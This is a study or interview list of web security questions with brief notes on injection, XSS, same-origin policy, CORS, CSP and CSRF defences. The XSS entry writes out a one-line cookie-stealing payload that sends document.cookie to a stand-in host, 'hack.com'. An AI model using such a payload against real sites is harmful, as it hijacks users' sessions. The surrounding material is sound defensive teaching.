# Security Questions
- What is an Injection attack? How do you guard against injection attacks? An injection attack is when code or an intrepreter takes in input and tries to use it as data but gets tricked into executing it as code or commands. the input tricks the interpreter into executing commands(sanitize input, don't allow full sql statements, create function that accepts just the parameters - you can use an ORM, which will handle this for you.)
- What are vulnerabilities? How do guard against vulnerabilities being exploited? (mention synk)
- How is the value of logging?
- What is HTTPS?
- What is XSS? (cross-site scripting -used for session hijacking by attaching cookies to query param - window.location = 'hack.com?cookie=' + document.cookie)
- What is an origin when talking about websites?
- What is Same-Origin Policy? (by default ajax requests are blocked (more precisely their responses are not read) if they are sent to a different origin, but js (and css, imgs, etc) files can be loaded from different origins), allowing js files is due to practicality, and probably the best vector of attack today. The reason for the Same-Origin Policy is because you don't want your APIs to be public by default, you usually only want just your application to be able to access your API. So when an ajax request is made, the request is sent, but the browser blocks your JavaScript from reading the response unless the target server allows cross-origin requests, which it can specify using CORS headers. 
- What is CORS? 
- What happens when a cross-origin request is made? (if it's a GET request, the response must have the CORS header - Access-Control-Allow-Origin: * or Access-Control-Allow-Origin: <origin>, if it's a POST or PUT request, a preflight request is made (OPTIONS), the response must respond with the CORS headers - Access-Control-Allow-Origin: * or Access-Control-Allow-Origin: <origin> and Access-Control-Allow-Methods: POST) 
- What is the 'cors' npm library?
- How should you store passwords in databases?
- What can you do if someone bombards your server with requests? (This is a denial of service attack)
- What are Content Security Policies?
- How can CSP help with XSS? (in additon to whitelisting domains, it can also prevent inserted inline scripts from running by setting the 'script-src' header to 'self')
- What are environment variables? How do they aid in security?
- What security concerns do you have to be aware of when committing to a remote repository?
- What is the principle of least privilege?
- What does the helmet package do? (sets some headers that help with security, including a Content Security Policy)
- What is CSRF? 
- Why does Same-Origin Policy not prevent CSRF? (because cross-origin requests are still executed on the server, same-origin policy just prevents the browser from reading the response that gets sent back, if you want to block cross-origin requests from executing on the server, you can use a middleware that checks the origin of the request and blocks it if it's not from your domain, but this is obviously not default behavior on any programming language's server)
- How to guard against CSRF? (setup server to check for cross-origin requests and block them if they are not from your domain, however this doesn't prevent all attacks because some requests don't sent origin/ referer headers so you can't tell, and also it won't block same-origin XSS based CSRF attacks. best defense is CSRF tokens + SameSite cookies. CSRF tokens are values tied to a session that are generated by the server and included in pages and forms to be sent with the request which identifies it as uncompromised)
